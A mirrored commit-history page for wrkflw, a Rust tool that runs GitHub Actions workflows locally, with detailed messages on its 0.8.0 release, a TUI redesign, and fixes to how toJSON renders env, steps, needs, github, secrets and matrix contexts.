mirror of
https://github.com/bahdotsh/wrkflw.git
synced 2026-05-18 13:16:04 +02:00
wrkflw-models@0.8.0
248 Commits
| Author | SHA1 | Message | Date | |
|---|---|---|---|---|
|
|
5ac563d213 |
Release 0.8.0
wrkflw@0.8.0 wrkflw-evaluator@0.8.0 wrkflw-executor@0.8.0 wrkflw-github@0.8.0 wrkflw-gitlab@0.8.0 wrkflw-logging@0.8.0 wrkflw-matrix@0.8.0 wrkflw-models@0.8.0 wrkflw-parser@0.8.0 wrkflw-runtime@0.8.0 wrkflw-secrets@0.8.0 wrkflw-trigger-filter@0.8.0 wrkflw-ui@0.8.0 wrkflw-utils@0.8.0 wrkflw-validators@0.8.0 wrkflw-watcher@0.8.0 Generated by cargo-workspacesv0.8.0 wrkflw-evaluator@0.8.0 wrkflw-executor@0.8.0 wrkflw-github@0.8.0 wrkflw-gitlab@0.8.0 wrkflw-logging@0.8.0 wrkflw-matrix@0.8.0 wrkflw-models@0.8.0 wrkflw-parser@0.8.0 wrkflw-runtime@0.8.0 wrkflw-secrets@0.8.0 wrkflw-trigger-filter@0.8.0 wrkflw-ui@0.8.0 wrkflw-utils@0.8.0 wrkflw-validators@0.8.0 wrkflw-watcher@0.8.0 wrkflw@0.8.0 |
||
|
|
4a3c5b2e73 |
docs: catch up on everything that landed after v0.7.3 (#107)
v0.7.3 was tagged back in August and then roughly fifty commits happened. The docs, predictably, noticed none of this. The README still advertised four TUI tabs when the TUI now has seven, still listed three runtime modes when there are four, still declared artifacts/cache/reusable-workflow outputs as "Not Supported" when all three shipped in #88 and #94, and never mentioned `wrkflw watch` or the `--event` / `--diff` / `--changed-files` flags at all. `wrkflw-trigger-filter` and `wrkflw-watcher` existed in the workspace without READMEs. Two of the Rust examples referenced a `runtime` field on `ExecutionConfig` that is actually called `runtime_type`, and printed a `summary_status` field that doesn't exist. One `run_wrkflw_tui` example was missing an argument. That kind of thing. While at it, BREAKING_CHANGES.md was labeling three entries as "(v0.7.3)" when the underlying commits all landed *after* the v0.7.3 tag — so calling them part of that release was, let's say, a work of fiction. Relabel as "(Unreleased)" with a note up top pointing at the next release. New trigger-filter and watcher READMEs are deliberately short — most users should hit that code through the CLI flags, not by depending on the crates directly. No point padding them. Nothing here is a code change. Just the docs finally telling the truth about what's in the tree. |
||
|
|
d2200a4066 |
docs: refresh demo.gif for the redesigned TUI (#106)
* docs: refresh demo.gif for the redesigned TUI The old demo.gif was recorded against the pre-#104 UI. After the design-system rebuild (#104) and the extra screens in #105, the README was showing a GIF that no longer matched the actual tool — which is worse than having no GIF at all. Re-record with VHS against the current TUI. The tape drives a tour of the new Workflows list, Tweaks overlay with accent cycling, DAG view across three different workflow shapes, Trigger / Secrets / Help tabs, and a live Podman run so the Execution and Logs tabs have real streaming output instead of an empty box. While at it, check in demo.tape so the next person who touches the UI doesn't have to reverse-engineer a recording session to keep the GIF in sync. Re-render with \`vhs demo.tape\`. * docs: scale up demo.gif, show Docker, drop the tape Three things were off about the first pass. One: the font was too small. At 14pt on a 1280-wide canvas the TUI was legible if you squint, but a README GIF needs to be readable at half-size on someone else's retina display. Bumped to 20pt on a 1680×960 canvas — same layout, just actually readable. Two: the run was Podman-only, which undersells things. wrkflw supports Docker, Podman, emulation and secure-emulation, and the GIF should show that. The tape now cycles all four runtimes with \`e\` (the runtime badge updates live in the title bar) and then kicks off the actual run in Docker so the Execution and Logs tabs stream real container output. Three: \`demo.tape\` doesn't belong in the repo. It's a build artifact for the GIF, not source, and keeping it tracked just invites drift between the tape and whatever is actually rendered. If someone needs to re-record, \`vhs record\` is a one-liner. * docs: run both Docker and Podman in the demo Showing the runtime indicator cycle through four values was technically correct but a bit hand-wavy — you see the badge change, not the actual container backend doing work. Run the same workflow twice: once on Docker, then reset with \`R\`, cycle the runtime to Podman with \`e\`, and run again. Both Execution + Logs tabs now show real streaming output with the runtime badge matching the backend that's actually running, which is the thing we were trying to demonstrate in the first place. |
||
|
|
ebe8083f33 |
feat(ui): ship screens 4, 7, 8 and the Tweaks overlay (#105)
* feat(ui): ship screens 4, 7, 8 and the Tweaks overlay PR #104 landed three screens from the Claude Design handoff (Dashboard, Live Run, Step Inspector) and deliberately punted the rest because "a UI without backing data is worse than no UI." Fair. Picked up the remaining screens that actually *have* backing data today, and left the one that doesn't alone. Three new top-level tabs: - DAG (tab 3) — full topological view of the selected workflow, `g` toggles between the spatial column layout and a stage-list layout. Reuses the existing `dag::topo_levels` so what you see here is exactly what the mini-DAG in the Execution tab shows, just bigger. - Trigger (tab 5) — form + live curl preview, dispatches through `wrkflw_github::trigger_workflow` or `wrkflw_gitlab::trigger_pipeline`. `p` flips platform, `+` adds a k=v input, `Tab` walks fields, `Enter` dispatches, `c` dumps the curl into the log buffer because integrating with every terminal's clipboard is not a fight I want to pick today. - Secrets (tab 6) — reads SecretConfig::default(), shows the providers the user actually has wired, detail pane with `m` to toggle the value mask. Runtime pills on the side share state with the existing runtime cycler. We do *not* render a list of individual secret keys; SecretManager doesn't expose a list_known_keys() and I refuse to fake one. Step Inspector's Matrix sub-tab now calls wrkflw_matrix::expand_matrix and renders up to 32 combos with an overflow badge. Status glyph inherits from the parent job because per-combo status isn't tracked end-to-end yet — a future executor change to surface it will drop straight into this render. Tweaks overlay (`,` key) ports the design's floating TweaksPanel. Only one knob: accent color, five slots matching the design palette. theme::set_accent_override plumbs the chosen color into a thread-local the brand mark and focused borders consult every frame. Dropped theme (dark/light) and density from the panel because they'd be dead toggles today — the rule is the rule. What's still not in: screen 6 (Run history + diff). That one needs a storage layer we don't have — no run persistence, no serialized run records, no diff engine. Building a UI on top of nothing would be exactly the thing PR #104 warned against. Left for a separate PR that starts from storage. Verified: cargo build --workspace, cargo clippy --workspace --all-targets -- -D warnings, cargo test --workspace (734 tests, all green), cargo test -p wrkflw-ui (25/25). Clean. * docs(examples): add ui-demo workflow set for the new screens The new UI (screens 4, 7, 8 + Tweaks) shipped without a dedicated set of workflows to poke at it. The existing tests/workflows/ fixtures are fine for the parser, but they don't have the shapes you actually want to eyeball — there's no clean diamond, no wide multi-stage fan-out, no workflow_dispatch with a mix of input types. So you end up firing up the TUI and squinting at whatever happens to be checked in. Not great. Add examples/ui-demo/ with one workflow per screen/feature: a diamond and a wide fan-out DAG for screen 4, a workflow_dispatch with choice / string / bool inputs for screen 8, a matrix with include/exclude plus three scopes of env for the Step Inspector, a secrets + services + container job for screen 7, a multi-event trigger for the `d` diff filter, and a mixed-status workflow so the status badges aren't stuck on all-green. Every file carries a header comment explaining which screen it targets and what to look at. All eight parse clean under `wrkflw validate`. * fix(ui): clean up loose ends around the new tabs and Tweaks overlay The DAG / Trigger / Secrets tabs and the Tweaks overlay shipped with the edges unfinished. A review turned up a pile of correctness and consistency bugs that individually didn't look like much but together amounted to "the tabs work but everything around them lies." The status bar's context_hints still only knew about the old 4-tab layout — tab 2 was now DAG but showed Logs hints, tab 3 was Logs but showed Help hints, tabs 4-6 went blank. The Help overlay still said "1-4 / w,x,l,h" and listed four tabs. Every keyboard-help surface was advertising the wrong layout. The Tweaks overlay's doc comment claimed it was modal — "the overlay wins" — but the match arm only handled Esc / \`,\` / \`a\`/\`A\`. Everything else (q, d, 1-7, ?) fell through to the global handler. The comment was aspirational. The code was not. trigger_dispatch had no in-flight guard. Hit Enter twice quickly, fire two workflow_dispatch requests. Against real repos. This is the kind of "oops we double-ran the deploy" bug that nobody enjoys. render_target_pane called resolve_target on every frame, which shelled out to \`git remote get-url origin\` + \`git symbolic-ref\` +/- \`git rev-parse\` *on every frame*. The event loop polls at 50ms, so sitting on the Trigger tab produced ~40-60 git subprocesses per second. Per second. And the DAG tab cheerfully printed fabricated column labels — ["setup", "lint", "build", "test/docs", …] — positionally assigned to topological levels, with no relationship to actual workflow content. A release pipeline's third layer would read "build" even when it was \`deploy\`. Exactly the "UI without backing data" footgun the previous PR was supposed to avoid. The fix is mechanical: - Rewrite status_bar hints and the Help overlay for 7 tabs. - Make the Tweaks overlay actually modal — unmatched keys \`continue\` instead of falling through. - Add a trigger_in_flight AtomicBool; set before spawn, cleared by the spawned task regardless of outcome. - Cache the resolved target on App; invalidate on platform toggle. No more subprocess storm. - Replace the hand-rolled JSON escaper with serde_json, which has been in the tree the whole time. While at it, shell-escape the GitHub ref and double-quote-escape the GitLab k/v pairs so the curl preview is copy-paste safe. - Drop the fabricated stage labels; print "stage N" because that's the honest thing. - Sort the include-only matrix column tail so HashMap order can't cause visual jitter between frames. - switch_tab re-masks secrets when leaving the Secrets tab. The doc had claimed this all along; now it's actually true. - Empty env vars no longer count as a set auth token. - trigger_input_cursor is Option<usize>, not a usize::MAX sentinel. Please don't use usize::MAX for "not set" when Option exists. Sixteen new unit tests cover the new helpers and edge cases. Full workspace build + clippy -D warnings + test suite clean. * fix(ui): stop the Trigger tab from smearing the TUI on dispatch The Trigger tab shipped in the previous commit calls into wrkflw_github::trigger_workflow and wrkflw_gitlab::trigger_pipeline from a tokio::spawn. Both of those are happily scattering println! and eprintln! calls — "Repository: x/y", "Using branch: main", "Workflow triggered successfully!", you name it — straight to the stdout that ratatui is rendering into. The TUI owns the terminal. The SDK crates write to it anyway. The result is a frame full of garbled half-redrawn panels the moment the user hits Enter. wrkflw_logging::set_quiet_mode(true) is already being armed at TUI start, but it only gates the logging subsystem — raw println! skips right past it. Route every one of those prints through wrkflw_logging::{info,warning} so the quiet-mode flag actually does the thing it says on the tin. Adds wrkflw-logging as a dep to both crates, which is fine — it's where those messages belonged in the first place. While at it, fix the rest of what was broken around the Trigger tab: The GitLab curl preview was cheerfully lying. It pointed users at /trigger/pipeline with a PRIVATE-TOKEN header, which is a combination that has never worked — /trigger/pipeline wants a trigger token, and the real dispatcher calls /pipeline with a JSON body. Copy-paste the preview and you'd get a 401, maybe a 404. Rebuilt both previews off the same request shape the dispatcher actually sends. GitHub and GitLab bodies are now built via serde_json end-to-end (github_dispatches_body, gitlab_pipeline_body), shell-escaped with a single helper, and the URL uses the resolved repo from the target cache instead of <owner>/<repo> / <id> placeholders. The dispatch outcome used to reach the user only via the Logs tab — the one on Trigger heard nothing back. Added a mpsc channel so the spawned task reports success/failure back to the main event loop, which mirrors it onto the status bar. Drain runs once per tick next to the existing execution-result drain. The DAG graph view was splitting the area into equal-ratio columns with no floor, so on anything narrower than 18 * stages cells the box-drawing characters wrapped and the whole graph looked like someone spilled coffee on it. Clamped columns to a fixed 18-cell width, render "+N more stages" in the overflow slot, and nudge users toward g for list view. Dropped the duplicated "L1 stage 1" header while I was in there. AccentScope wraps the thread-local accent override in an RAII guard so it lives for exactly one frame. A thread-local that nobody ever clears is a booby trap for whoever adds the second theme knob. The old trigger-dispatch test spawned a real tokio task that called the real wrkflw_github::trigger_workflow. If GITHUB_TOKEN happened to be set in the environment — hello, CI — it would fire a real workflow_dispatch against whatever repo git remote resolved to. That is not a test. Replaced with a synchronous guard test that pre-arms the in-flight flag and asserts rejection. No spawn, no runtime, no network. New tests cover the preview bodies, split_slug, and the outcome-drain mapping. * fix(ui): sand off the UX edges flagged in the screens-4-8 review A review pass over the new DAG / Trigger / Secrets / Tweaks tabs turned up a small but consistent failure mode: several bits of the UI were quietly lying to the user, and a couple of input paths were eating keystrokes that mattered. The Secrets tab's header badge advertised "providers configured", but the tab reads `SecretConfig::default()` unconditionally — no real config file is loaded yet. A user who had carefully customised their secrets config would see the two hard-coded defaults and a badge telling them everything was wired up. That's exactly the "UI without backing data" footgun PR #104 set out to ban. Rename the badge to "default providers" and update the file header so the caveat doesn't get lost the next time someone skims the module. The Trigger tab's edit-mode key handler returned `false` for Up / Down / Left / Right, which meant directional keys fell through to the global handler and called `trigger_tab_prev/next_workflow`. So a user typing `env=prod` who hit ↓ to correct the row above had the *workflow about to be dispatched* silently changed underneath them. Consume the arrows in edit mode — no-op for now; a future enhancement can route them to prev/next field if we want that. `resolve_trigger_target`'s error branch admitted the repo was `<unresolved>` while cheerfully inventing `default_branch: "main"`. Two fields, two voices, one warn badge the user might or might not notice. Mark the branch `<unresolved>` too so the un-resolution story is consistent. The dispatcher has its own `get_repo_info` call in the hot path, so this is strictly a display-honesty fix. The Tweaks overlay was modal to the point of swallowing `q`. Quit is universally modal-safe in this TUI; silently eating it is a discoverability trap. Let it through. While at it, `field_row_hl` was taking `hint: String` where the sibling `field_row` took `&str`. Match the sibling. Tiny thing, but the kind of inconsistency that compounds. Two regression tests pinned to the arrow-swallow path and the resolve-error shape, so a future refactor can't quietly re-open either footgun. * fix(ui): clear out the self-review pile for screens 4-8 A review of the new DAG / Trigger / Secrets tabs and the Tweaks overlay turned up a depressingly long list of "works in the happy path, lies to the user otherwise" bugs. Dealing with them in one sweep rather than trickling out a dozen one-liner fixes. The headliner: the Trigger tab renders a "Branch / ref" row as if it's editable, but *no keystroke* ever wrote into `trigger_branch`. The dispatcher and the curl preview both honoured the field — the field just had no input path. A user wanting anything other than the git-resolved default was out of luck. Add a `b` shortcut to focus the branch row, extend `trigger_handle_input_key` to route into `self.trigger_branch` when focused, and rework `trigger_tab_next_field` so Tab cycles Branch → Input(0).key → Input(0).value → … → wrap. Three tests pin the edit path, the Esc-clears-override path, and the mutual exclusion between branch edit and input edit. `state_for_job` in the DAG tab was using `std::ptr::eq` against `app.workflows` elements to figure out which workflow was the current execution, with `usize::MAX` as the fallback. It worked today because the render path gets its `&Workflow` from the same Vec, but it was one refactor away from returning `Some(usize::MAX)` and silently matching against `app.current_execution`. Thread the index the caller already has and compare that. No more pointer identity. The Secrets tab's "reveal / mask" toggle was theatre. There are no actual secret values at this layer — the "value" being masked was the *provider's source descriptor*, i.e. a filesystem path or an env-var prefix. Bullet-masking a filename protects nothing and teaches the user that "masking" means something it doesn't. Rip out `secrets_reveal`, the `m` handler, and the `switch_tab` auto-revert. When per-secret values land the toggle can come back attached to something it can legitimately hide. The Trigger tab's curl preview was building a `format!` string with Rust's backslash-newline line continuation (which *strips* the backslash) and then splitting the result on `" \\"`. That split never matched anything, so the preview rendered as one long line relying on terminal wrap. Rebuild with explicit ` \\\n` joins and split on `\n` at render time. `format_yaml_scalar`'s fallback runs non-scalar matrix values through `serde_yaml::to_string`, which for sequences and maps returns multi-line YAML. That got shoved into a single ratatui Span. Collapse embedded newlines to a visible ` · ` separator. `drain_trigger_outcomes` overwrote `status_message` on every iteration — if two outcomes arrived in the same tick (rare, but the in-flight guard could relax later) the first was silently lost. Log each drained outcome to `self.logs` as the durable record, and have the status bar prefer errors over later successes in the same drain. Tab indices: stop pretending `2, 3, 4, 5, 6` are self-documenting. Introduce `TAB_WORKFLOWS` / `TAB_EXECUTION` / … constants next to `TAB_LABELS` and use them everywhere. `switch_tab` used to define a local `SECRETS_TAB = 5` that the rest of the file promptly ignored. Please don't do that. While at it, widen the accent override plumb-through. The Tweaks panel claimed to recolour the UI but only `block_focused` and the title_bar brand were actually consulting `current_accent()` — the other 14 `COLORS.accent` call sites stayed on the static palette. A user flipping accent saw the focused borders change and nothing else, which looks broken. Point all accent readers at the thread-local override. Minor: hoist \`provider_entries()\` to one call per frame (was 3×), dedupe the \`truncate(name, 12)\` call in the DAG graph (was computed twice per node). cargo fmt + clippy -D warnings clean; 48/48 UI tests green. * fix(ui): close the screens-4-8 review debt A review pass over the screens-4-8 branch turned up three things that the earlier "done" sweep in |
||
|
|
1824e73ebd |
feat(ui): rebuild TUI to match the new design system (#104)
* feat(ui): rebuild TUI to match the new design system Phase 1 of the redesign that landed in the Claude Design handoff bundle: Workflows becomes a Dashboard, Execution becomes a 3-pane Live Run, Job detail becomes a tabbed Step Inspector. The visual DNA — palette, status bar, title bar, status badges — now matches the design instead of inheriting whatever your terminal feels like. The old palette used ratatui named colors (Color::Cyan, Color:: Yellow, ...), which means every terminal got a slightly different TUI. Swap to exact RGB straight from the design (#5fd3f3 cyan, #f5d76e yellow, #8fce8f green, #d68cff trigger purple, ...). Same TUI everywhere, at the cost of not respecting per-terminal themes. Fair trade. Layouts: - Title bar: flat 1-row with brand mark, numbered tabs, and a right-side pulsing LIVE indicator + runtime badge. - Status bar: left-aligned [key] chips, right-aligned validation / runtime / availability / workflow count. Key hints stop being one fat string concatenation. - Workflows: 60/40 split. Table on the left grows columns for trigger-match dot and job count. Right column stacks Preview (parsed name / on / jobs / chain / counts), Trigger filter (live match/skip counts), Quick actions (six labelled key tiles). - Execution: 3 panes — Jobs (synthesised from job_names so pending jobs show too, not just executed ones) · Steps + Live output · Mini DAG (topo-laid from Job.needs) + Timing chart. - Job detail: tabbed Step Inspector — Output / Env / Files / Matrix / Timeline. Tab cycles them when in detailed view. Env and Files are honest placeholders because per-step env snapshots and workspace-diff capture don't exist yet in the executor. Faking them looked tempting; I didn't. Workflow now carries an Arc<WorkflowDefinition> populated at load time, so Preview and the mini DAG read real data instead of re-parsing on every frame. App gains a step_inspector_tab: usize plus a Tab handler when detailed_view is true. What's *not* in this PR: screens 4-8 from the design (DAG full view, Matrix expansion, Run history+diff, Secrets manager, Remote trigger UI) and the Tweaks panel. Those need new feature plumbing in the executor / runtime / storage, not just render work, and a UI without backing data is worse than no UI. Verified: cargo build --workspace, cargo clippy --workspace --all-targets -- -D warnings, cargo test --workspace, cargo test -p wrkflw-ui (25/25). All clean. * style(ui): cargo fmt |
||
|
|
7b2a27a532 |
refactor(executor): separate user env from runner env in ExpressionContext (#102)
* refactor(evaluator): add user_env field to ExpressionContext
Prior commits landed bare-context support for toJSON(steps),
toJSON(needs), toJSON(github), toJSON(secrets), and toJSON(matrix).
toJSON(env) is next — and it's the ugly one. The existing
implementation filters env_context through an is_user_env_var()
heuristic: "if the key doesn't start with GITHUB_/RUNNER_/INPUT_/
WRKFLW_ and isn't CI or MATRIX_CONTEXT, it must be user-declared."
It turns out that's wrong in both directions. A user who writes
`env: { GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} }` in their YAML —
which is the single most common pattern on planet Earth — gets their
token silently dropped from toJSON(env). Meanwhile any new runner
var that isn't on the exclusion list leaks in. Key-level guessing
can't separate the two populations after they've been merged into
one flat map. The fix has to happen at the seam.
So: add `user_env: &'a HashMap<String, String>` to ExpressionContext
alongside env_context. env_context stays as-is (it's the union, used
for dotted `env.FOO` and `github.FOO` lookups); user_env carries
only what the user declared, and that's what toJSON(env) reads.
This commit is the mechanical half. The field is wired through every
construction site, but at each production site in engine.rs we build
user_env inline by running the old heuristic against env_context —
exactly the behavior we had before, just relocated. Not pretty, but
it keeps the tree green and all 399 tests passing while the plumbing
lands. Commit 2 replaces these inline filters with a user_env that's
tracked properly through the workflow/job/step env merges and the
$GITHUB_ENV writes, and deletes is_user_env_var for good.
The test helpers (empty_ctx, make_ctx, etc.) dual-populate env_context
and user_env from the single env argument, so most tests didn't
need touching. Three toJSON(env) tests did — they were stuffing
runner vars into the same map as user vars and asserting the
heuristic filtered them, which is a thing that can't be expressed
anymore. Those now construct ExpressionContext directly with
distinct populations. While at it, the test that was literally
called tojson_env_excludes_user_var_with_internal_prefix — which
asserted the bug as if it were a feature — is inverted and renamed.
Please don't write tests that ratify bugs.
StepExecutionContext::expr_context() and expr_context_with_env()
grew a user_env_buf: &mut HashMap parameter because the returned
ExpressionContext has to borrow from somewhere, and self is
already borrowing job_env. Callers pass a local buffer. Ugly but
localized — and this too goes away in Commit 2 when the struct
carries its own user_env field.
* refactor(executor): track user_env through layered env merges
Commit 1 added the user_env field to ExpressionContext but populated
it at each construction site by re-running the same is_user_env_var()
heuristic against env_context. That was honest plumbing — it said
"here's where the field goes" without actually changing any behavior.
Now we replace the heuristic with the thing it was always pretending
to be.
The real shape is: env_context is still the union used for dotted
lookups (env.FOO, github.X). Alongside it we now carry user_env as a
parallel HashMap that is strictly what the user declared — nothing
more, nothing less. Thread it through JobExecutionContext,
MatrixExecutionContext, and StepExecutionContext, populated at the
four places where user env actually enters the system:
1. Workflow-level: seeded empty, workflow.env resolved values
get mirrored in (with the same or_insert precedence as
env_context, so workflow.env doesn't shadow runner vars).
2. Job-level: clone workflow user_env, layer container.env and
job.env on top. Runner-internal GITHUB_JOB (via
add_job_context) stays in env_context only.
3. Matrix jobs: same as job-level but skip the MATRIX_*
vars — they're runner-internal, they belong to the matrix
context, not to env.
4. Step-level: clone job user_env, layer step.env on top after
expression resolution.
And the one that mattered most: GITHUB_ENV writes from steps.
apply_step_environment_updates now mirrors env-file writes into
user_env too, because a step running 'echo FOO=bar >> GITHUB_ENV'
is user-declaring FOO by definition — otherwise a step that writes
its own FOO wouldn't see it in the next step's toJSON(env).
GITHUB_PATH updates stay out of user_env because PATH is not a
user-declared env var. There's a test for this.
With real tracking in place, is_user_env_var() is gone, along with
its environment.rs test that did nothing but rubber-stamp the
heuristic's list of prefixes. StepExecutionContext::expr_context()
and expr_context_with_env() lose the ugly user_env_buf: &mut
HashMap parameter that Commit 1 used as a bridge — they read
self.job_user_env directly now.
Two non-obvious scope decisions, both flagged in the code:
- Reusable workflows (run_called_workflow) get an empty
user_env on entry. Parent workflow.env doesn't leak across
reusable-workflow boundaries, and the called workflow's own
workflow.env isn't merged into child_env at all (that's a
pre-existing gap, not mine to fix here). Job-level env merges
still populate user_env correctly downstream.
- GitLab pipelines don't carry a workflow-level env:, so the
gitlab-path callsite also starts with empty user_env.
398 tests pass, clippy clean, fmt clean. The PR that ships this
fixes the original bug: a user who writes their GITHUB_TOKEN via
workflow/job/step env: will now actually see it in toJSON(env).
Which, let's be honest, they should have been able to see all along.
|
||
|
|
74499d5279 |
feat(evaluator): make toJSON(matrix) return matrix object (#101)
It turns out that `toJSON(matrix)` has been returning "null" this
whole time — same disease as env, steps, needs, github, and
secrets before it. The evaluator had no bare-`matrix` branch in
ExpressionContext::resolve, so resolving the identifier fell
through to the catch-all `_ => Null` and toJSON dutifully
serialised that. Fifth and last in a series after #96/#97/#98/#99
/#100.
The fix is the obvious one. `matrix_combination` is already a
flat `&Option<HashMap<String, serde_yaml::Value>>` holding
exactly the shape real GHA exposes as the `matrix` context for a
single combination. Convert each value via the existing
`yaml_value_to_expr` helper — the same helper the dotted-access
arm already uses — so the bare and dotted forms agree on
per-value shape. Wrap the result in ExprValue::Object. Done.
One intentional asymmetry with the other bare-context arms:
when `matrix_combination` is `None` (non-matrix job), return
`Null` instead of an empty Object. `None` encodes "no matrix
context exists", which is what real GHA exposes for jobs without
a matrix strategy. `Some(empty)` — pathological but possible —
still renders as `{}`, preserving the Some-vs-None distinction
carried by the field's `Option<...>` type. There's a test
pinning each half of that split so any future change is
deliberate.
Tests mirror the #96–#100 suites: populated matrix, empty
combination, None → "null", mixed value types (string/number/
bool preserved natively, not stringified), sorted keys,
fromJSON(toJSON(matrix)) round-trip, bare-matrix truthiness in
both populated and None states, a regression guard that the
bare arm doesn't shadow the existing dotted-access arm, and a
YAML-sequence test that pins the current `yaml_value_to_expr`
fallback behaviour for non-scalar values.
While at it, drop the stale `TODO: support other bare contexts:
matrix` comment entirely. No bare contexts remain after this.
|
||
|
|
e4752efa8e |
feat(evaluator): make toJSON(secrets) return secrets object (#100)
It turns out that toJSON(secrets) has been returning "null" this whole time — same disease as env, steps, needs, and github before it. The evaluator had no bare-`secrets` branch in ExpressionContext::resolve, so resolving the identifier fell through to the catch-all `_ => Null` and toJSON dutifully serialised that. Fourth in a series after #96/#97/#98/#99. The fix is the simplest of the bunch. secrets_context is already a flat &HashMap<String, String> holding exactly the shape real GHA exposes as the `secrets` context — no prefix strip, no exclusion list (unlike #99's github arm), no nested outputs sub-object (unlike steps/needs). Clone the entries into ExprValue::String and wrap in ExprValue::Object. Done. Values are returned in plaintext by design. That matches real GHA — `toJSON(secrets)` there is not auto-redacted either, and the common `fromJSON(toJSON(secrets))` pipe-through-an-action pattern depends on the exact original values surviving the round-trip. Masking stays where it belongs: the log boundary, via wrkflw_secrets::SecretMasker, already wired up in engine.rs. Pulling the masker into the evaluator would (a) break the fromJSON round-trip, (b) diverge from GHA semantics, and (c) duplicate a concern that already has one correct home. Please don't do that. Tests mirror the #96–#99 suites: populated secrets, empty context, sorted keys, special-character values (quotes, backslashes, PEM-style newlines), fromJSON(toJSON(secrets)) round-trip, bare-secrets truthiness, a regression guard that the bare arm doesn't shadow the existing dotted-access arm, and a plaintext-values test that pins the no-masking-here decision so any future switch is deliberate rather than silent. While at it, drop `secrets` from the lingering `TODO: support other bare contexts` comment. Only `matrix` remains. |
||
|
|
bb55e7f30f |
feat(evaluator): make toJSON(github) return github object (#99)
* feat(evaluator): make toJSON(github) return github object
It turns out that `toJSON(github)` has been returning `null` this
whole time — same disease as `env`, `steps`, and `needs` before it.
The evaluator had no bare-`github` branch, so resolving the
identifier fell through to the catch-all `_ => Null` and toJSON
dutifully serialized that.
The fix mirrors the bare-`env` arm added in #96. There's no
dedicated `github_context` field — `env_context` is already the
source of truth for `GITHUB_*` vars, since the dotted-access arm
(`github.sha` → `GITHUB_SHA`) reads from there. So the bare case is
just the inverse mapping: iterate env_context, filter keys starting
with `GITHUB_`, strip the prefix, lowercase, and wrap it as an
Object.
Still doesn't produce a nested `event` sub-object. That's the same
documented limitation as the dotted-access path — real GHA parses
`$GITHUB_EVENT_PATH` as a full JSON payload and we approximate it
via flat env vars. Not fixing that here; it's a bigger conversation.
Add tests for the populated case, empty env, no-GITHUB-prefix,
sorted keys, truthiness of bare `github`, a regression guard so
this arm doesn't shadow dotted access, special-character values,
and a fromJSON(toJSON(github)) round-trip.
Third in a series after #96 (env), #97 (steps), #98 (needs). Same
pattern. `secrets` and `matrix` still return null — those are
next.
* refactor(evaluator): tighten toJSON(github) after review
The toJSON(github) arm that landed in the previous commit had a few
rough edges worth fixing while it's still fresh.
The .strip_prefix("GITHUB_").unwrap_or(k) was dead-branch defensive
code — the preceding .filter(...) already guarantees the prefix, so
the fallback path couldn't actually execute. That's the worst kind
of defensive code: it obscures intent without doing any work.
Replace it with a direct slice. While at it, swap to_lowercase() for
to_ascii_lowercase() since env-var keys are ASCII.
Add k.len() > PREFIX.len() to the filter so a literal GITHUB_ key
doesn't strip-become-empty and emit a {"": "..."} entry. Not because
anyone is going to set that, but because silently emitting nonsense
is worse than not emitting it.
Expand the limitation comment: user-defined env vars with the
GITHUB_ prefix (notably the common env: { GITHUB_TOKEN: ... }) will
land in the output object, and GITHUB_TOKEN surfaces as github.token
in plaintext. No masking layer exists yet. Please don't dump
toJSON(github) into untrusted sinks.
Two new tests pin the token-leak behavior and the empty-suffix
filter so any future change is deliberate.
* fix(evaluator): exclude runner-internal keys from toJSON(github)
Another round of review on the bare-github arm turned up something
worth fixing before this lands.
It turns out that environment.rs unconditionally seeds GITHUB_OUTPUT,
GITHUB_ENV, GITHUB_PATH, and GITHUB_STEP_SUMMARY into env_context —
those are local tempfile paths for the runner's file-based
workflow-command protocol. In real GHA they're invisible to
expressions; they are not members of the `github` context. The
prefix-strip heuristic was happily leaking them out as `github.output`,
`github.env`, `github.path`, and `github.step_summary`, pointing at
paths inside our temp dir.
That's a semantic divergence from real GHA *and* a minor info leak
into any log that dumps toJSON(github). Not great.
Add a tiny INTERNAL_KEYS blocklist to the filter and drop them on
the floor. While at it, collapse the manual `k.len() > PREFIX.len()
&& k.starts_with(PREFIX)` + byte-slice dance into a single
strip_prefix + filter chain — same behavior, one prefix check
instead of two, and no byte-offset slicing that depends on PREFIX
being pure ASCII.
Two new tests: one pins the internal-keys exclusion, the other
locks in the documented GITHUB_FOO contamination case so any future
switch to a curated allowlist is a deliberate change, not a silent
behavior flip.
* fix(evaluator): close the last runner-internal hole in toJSON(github)
One more pass on the bare-github arm turned up another runner-only
env var quietly slipping past the INTERNAL_KEYS blocklist, plus a
small maintenance wart worth cleaning up while we're still close to
the code.
It turns out that environment.rs also seeds GITHUB_ACTIONS=true
unconditionally, for CI-detection. Real GHA documents that one as a
default runner env var, not as a property of the `github.*` context
— there is no `github.actions`. So the previous blocklist, which
only caught the workflow-command-protocol tempfile paths
(output/env/path/step_summary), was still letting `"actions": "true"`
through. Harmless in value, but exactly the same class of shape
divergence that
|
||
|
|
295b309517 |
ci: silence new clippy::collapsible_match in TUI event loop
Clippy on main has been failing since the runner picked up Rust
1.95. The collapsible_match lint got stricter and now complains
about every match arm whose body is just `if cond { ... }` —
twelve of those live inside run_tui_event_loop's big
`match KeyCode`.
The "fix" clippy suggests is match guards: `KeyCode::Char(' ')
if cond => { ... }`. Tempting, but wrong. That same match ends
with a `KeyCode::Char(c)` catch-all that pipes keys into log
search. Convert the earlier arms to guarded patterns and every
time a guard fails — space pressed outside tab 0, 'a' while
running, etc. — the key falls through into the log-search
input handler. That's a behavior change dressed up as a
refactor, and not one I want landing under a CI fix.
So just slap `#[allow(clippy::collapsible_match)]` on the
function and move on. Matches the existing convention in
engine.rs for other function-scoped lint allows. If someone
later wants to actually restructure that match, they can do it
as its own change with its own testing.
|
||
|
|
09903569eb |
feat(evaluator): make toJSON(needs) return nested needs object (#98)
* feat(evaluator): make toJSON(needs) return nested needs object Same bug that toJSON(steps) had before #97, and toJSON(env) had before #96: resolve() had no match arm for the bare "needs" identifier, so it fell through to Null. Anyone trying to dump the cross-job outputs context got "null" back. Useful. Build the shape GHA actually provides: each job ID maps to an object with "outputs" (sub-object) and "result". Merge the key sets of needs_context and needs_results so a job appears even if only one of the two has recorded something for it — same union-of-keys trick as the steps arm. Omit "result" when no result was recorded, mirroring how steps omits outcome/conclusion in that case. The only real shape difference vs. steps is the single "result" string instead of the (outcome, conclusion) pair. Tests mirror the toJSON(steps) suite: populated context, empty, sorted keys, one-sided populations, and special-character escaping. Also drops "needs" from the lingering TODO comment — github, secrets, matrix still to go. * chore(secrets): silence clippy::unnecessary_sort_by in masker Clippy 1.95 decided that `sort_by(|a, b| b.0.len().cmp(&a.0.len()))` is an unnecessary dance when `sort_by_key` with `Reverse` says the same thing in 